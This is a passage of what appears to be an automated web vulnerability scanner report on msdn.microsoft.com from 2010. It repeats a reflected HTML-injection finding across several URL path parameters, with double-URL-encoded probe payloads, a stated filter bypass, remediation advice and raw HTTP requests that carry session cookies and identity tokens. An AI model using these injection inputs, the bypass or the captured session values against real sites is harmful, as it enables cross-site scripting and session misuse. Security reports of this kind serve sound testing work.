17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:24 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6f4c1"><a>a9f77ed350d/dd582938(office.11" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47a5b%2522%253e%253ca%253e22a3e17d330 was submitted in the REST URL parameter 3. This input was echoed as 47a5b"><a>22a3e17d330 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582938(office.1147a5b%2522%253e%253ca%253e22a3e17d330 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(office.1147a5b"><a>22a3e17d330" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feb63%2522%253e%253ca%253e27a0f0d059b was submitted in the REST URL parameter 1. This input was echoed as feb63"><a>27a0f0d059b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usfeb63%2522%253e%253ca%253e27a0f0d059b/library/dd582938(office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:55:28 GMT Content-Length: 9197
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usfeb63"><a>27a0f0d059b/library/dd582938(office.11)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58b3%2522%253e%253ca%253ea478026753a was submitted in the REST URL parameter 2. This input was echoed as a58b3"><a>a478026753a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarya58b3%2522%253e%253ca%253ea478026753a/dd582938(office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:55:59 GMT Content-Length: 9196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya58b3"><a>a478026753a/dd582938(office.11)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fd90%2522%253e%253ca%253e989d6e38d2f was submitted in the REST URL parameter 3. This input was echoed as 5fd90"><a>989d6e38d2f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582938(office.11).aspx5fd90%2522%253e%253ca%253e989d6e38d2f HTTP/1.1 Host: msdn.microsoft.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:56:29 GMT Content-Length: 9206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(office.11).aspx5fd90"><a>989d6e38d2f" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75f6%2522%253e%253ca%253e1af47b0d7bc was submitted in the REST URL parameter 1. This input was echoed as d75f6"><a>1af47b0d7bc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usd75f6%2522%253e%253ca%253e1af47b0d7bc/library/dd582938(v/x3doffice.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9229 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:22 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd75f6"><a>1af47b0d7bc/library/dd582938(v/x3doffice.11" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0137%2522%253e%253ca%253e0e5c27062dd was submitted in the REST URL parameter 2. This input was echoed as c0137"><a>0e5c27062dd in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryc0137%2522%253e%253ca%253e0e5c27062dd/dd582938(v/x3doffice.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
